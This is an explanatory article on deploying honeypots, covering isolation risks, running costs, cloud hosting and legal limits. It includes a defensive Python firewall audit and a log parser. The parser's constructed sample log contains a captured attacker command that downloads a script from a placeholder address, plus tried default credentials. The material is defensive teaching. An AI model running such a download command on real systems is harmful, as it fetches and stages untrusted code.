Why Use Honeypots?

For an organization that has a reasonably complete security posture, including a mature threat intelligence capability, implementing a so-called "honeypot" should be considered. A honeypot is a kind of digital decoy set for potential attackers. It lures them in by pretending to be the target they were looking for, sometimes with deliberately built-in vulnerabilities that appear to be waiting to be exploited.
Once the attackers start using the honeypot system, believing they have reached their intended target, all of their actions are recorded and every modified or newly dropped file is captured. In this way, a great deal can be learned about potential adversaries, their Tools, Techniques and Procedures (TTPs) and how they would circumvent the organization's actual production security controls. It allows for truly proactive security intelligence gathering, although there are some caveats.
The Issue With Honeypots

A honeypot can be a great weapon in the arsenal of defensive security teams. Its use does, however, come with some challenges.
The obvious one is the risk that an attacker successfully exploits the honeypot and then manages to move laterally into the actual production network. It is vital to isolate a honeypot from every other network. This sounds like a straightforward task, but it only takes a single forgotten system or a single firewall rule change to create a very dangerous situation. Networks are inherently complex.
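An added example (not from the original article) of the kind of isolation check a single forgotten rule calls for: a Python audit that flags any outbound "allow" from the honeypot segment towards assumed production ranges. The rule format, the production CIDRs and the addresses are constructed for this illustration, not any provider's real format.

```python
import ipaddress

# Constructed rule set in a simplified, vendor-neutral security-group style.
# Each rule is (direction, protocol, remote CIDR, action); this is an illustration,
# not a real cloud provider's rule format.
HONEYPOT_RULES = [
    ("in",  "tcp", "0.0.0.0/0",       "allow"),  # attackers may reach the decoy services
    ("out", "tcp", "203.0.113.10/32", "allow"),  # log forwarder (TEST-NET-3 placeholder address)
    ("out", "any", "10.0.0.0/8",      "allow"),  # the "single forgotten rule": production reachable
    ("out", "any", "0.0.0.0/0",       "deny"),   # everything else blocked
]

# Address ranges the production network lives in (assumed for this example).
PRODUCTION_CIDRS = ["10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"]


def egress_violations(rules, production_cidrs):
    """Return every outbound 'allow' rule whose remote CIDR overlaps a production range.

    Each rule is judged on its own (first-match ordering is deliberately not modelled),
    so a broad allow such as 0.0.0.0/0 is reported even if a narrower deny exists.
    """
    prod = [ipaddress.ip_network(c) for c in production_cidrs]
    violations = []
    for direction, proto, cidr, action in rules:
        if direction != "out" or action != "allow":
            continue
        remote = ipaddress.ip_network(cidr)
        if any(remote.overlaps(p) for p in prod):
            violations.append((direction, proto, cidr, action))
    return violations


def is_isolated(rules, production_cidrs):
    """True when the honeypot has no outbound allow towards production."""
    return not egress_violations(rules, production_cidrs)


if __name__ == "__main__":
    for rule in egress_violations(HONEYPOT_RULES, PRODUCTION_CIDRS):
        print("honeypot can reach production:", rule)
```

Run it against the real rule export after every change to the honeypot's network configuration, not just at deployment time.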
Another challenge is the amount of time, and therefore cost, that comes with managing a honeypot. The system needs to be configured and maintained, of course. But that is not all: the captured activity has to be used within the organization's security teams for it to be of any value. Structuring this and fitting it into operational processes can take a lot of time. The information needs to lead to actionable intelligence, such as blocking the adversary's infrastructure, creating Intrusion Prevention System rules, or creating or tuning malware signatures.
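One way to turn captured honeypot activity into the actionable items listed above, as an added example that is not from the original article: a small Python script that condenses constructed JSON-lines events into attacker sources, tried credentials, payload-hosting infrastructure and dropped-file hashes. The record layout, the addresses and the hash value are assumptions made for this illustration.

```python
import json
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample of captured honeypot activity in a JSON-lines layout chosen for
# this example. Addresses come from the RFC 5737 documentation ranges and the hash
# is a labelled placeholder, not a real indicator.
SAMPLE_EVENTS = """\
{"ts": "2024-01-01T10:00:01Z", "src_ip": "198.51.100.7", "event": "login", "user": "root", "password": "123456", "success": false}
{"ts": "2024-01-01T10:00:02Z", "src_ip": "198.51.100.7", "event": "login", "user": "root", "password": "toor", "success": true}
{"ts": "2024-01-01T10:00:09Z", "src_ip": "198.51.100.7", "event": "command", "input": "wget http://203.0.113.5/x.sh"}
{"ts": "2024-01-01T10:00:11Z", "src_ip": "198.51.100.7", "event": "download", "url": "http://203.0.113.5/x.sh", "sha256": "PLACEHOLDER_SHA256_1"}
{"ts": "2024-01-01T10:05:00Z", "src_ip": "192.0.2.33", "event": "login", "user": "admin", "password": "admin", "success": false}
"""

def parse_events(text):
    """Parse JSON-lines honeypot output, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # one corrupted line must not discard the whole capture
    return events

def build_intel(events):
    """Condense raw events into the pieces a security team can act on."""
    intel = {"sources": Counter(), "credentials": Counter(),
             "payload_hosts": set(), "file_hashes": set(), "intrusions": set()}
    for e in events:
        intel["sources"][e["src_ip"]] += 1          # who attacked and how noisy they were
        if e["event"] == "login":
            intel["credentials"][(e["user"], e["password"])] += 1  # for auth-log / IPS rules
            if e.get("success"):
                intel["intrusions"].add(e["src_ip"])   # sources that actually got in
        elif e["event"] == "download":
            intel["payload_hosts"].add(urlsplit(e["url"]).hostname)  # adversary infrastructure
            intel["file_hashes"].add(e["sha256"])                    # for signature tuning
    return intel

def blocklist(intel):
    """Addresses to block at the perimeter: successful intruders plus payload hosts."""
    return sorted(intel["intrusions"] | intel["payload_hosts"])
```

The resulting blocklist and hash set are the kind of output that can be fed straight into perimeter rules and signature tuning, which is the step that makes the honeypot worth its running cost.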
Using the Cloud

Some of the challenges mentioned above can be overcome by using a public cloud system to host a honeypot.
The public cloud provides complete isolation from any production network. There is also no need for specific hardware or dedicated internet connections. Once a machine has been compromised and the data has been collected, a snapshot can be used to revert the system to its captured state from before the attack took place.
Another nice advantage of using public cloud infrastructure for a honeypot deployment is that it can be distributed anywhere in the world by choosing the desired geographical locations in the cloud system configuration. A sensor can be placed in East Asia one day and moved to Germany the next with just a few mouse clicks. Considering that the observed attacks and attackers can differ a lot depending on the location of the exposed system, this is great for research and intelligence gathering purposes. A honeypot placed in Russia will see a quite different range of attacks and scanning activity compared to the same system in Brazil. A distributed honeypot network consisting of a manager and several sensors, such as the Modern Honey Network (MHN), benefits even more from this flexibility.
Some honeypot products are built around a private cloud instance as well, such as the Thinkst (Cloud) Canary. Canary honeypot devices are deployed at strategic locations inside the customer's network. These sensors all report back to a central, cloud-based system, allowing the customer to detect perimeter activity and lateral movement inside the production network when a real attacker unexpectedly interacts with one of these sensors. This system does not come cheap, but it will still provide significant visibility once all other detections have failed to keep the attacker out. In this case, the cloud connectivity assists in the preservation of logs, improves customer accessibility and enables the very quick and easy deployment of what can be a complex honeypot infrastructure.
Limitations

There is a direct correlation between placement and relevance when it comes to honeypots.
For a honeypot to produce the most relevant (and actionable) output, it must somehow be linked to the organization a potential attacker is interested in. This could be via a fake company website or a registered domain name. Only then will the organization be able to observe attacks that are actually targeted, rather than simple scans from attackers looking for any low-hanging fruit. Of course, if possible, placing a honeypot inside the organization's existing cloud perimeter can also help with the identification of targeted attacks, but its isolation must be well designed.
There is also a legal and policy side to the use of honeypots. Some cloud providers do not particularly like the idea of directing hackers into their networks and collecting malware within their infrastructure. After all, once the host is compromised, there is a chance it will be used to attack other targets on the internet. When this is the case, it may harm the reputation of the cloud provider (hosting the compromised system) and may even result in the blocking of that provider's IP ranges and domains, impacting its other paying customers.
When in doubt, always review the provider's usage policies or contact the provider for permission before setting up a cloud-based honeypot system.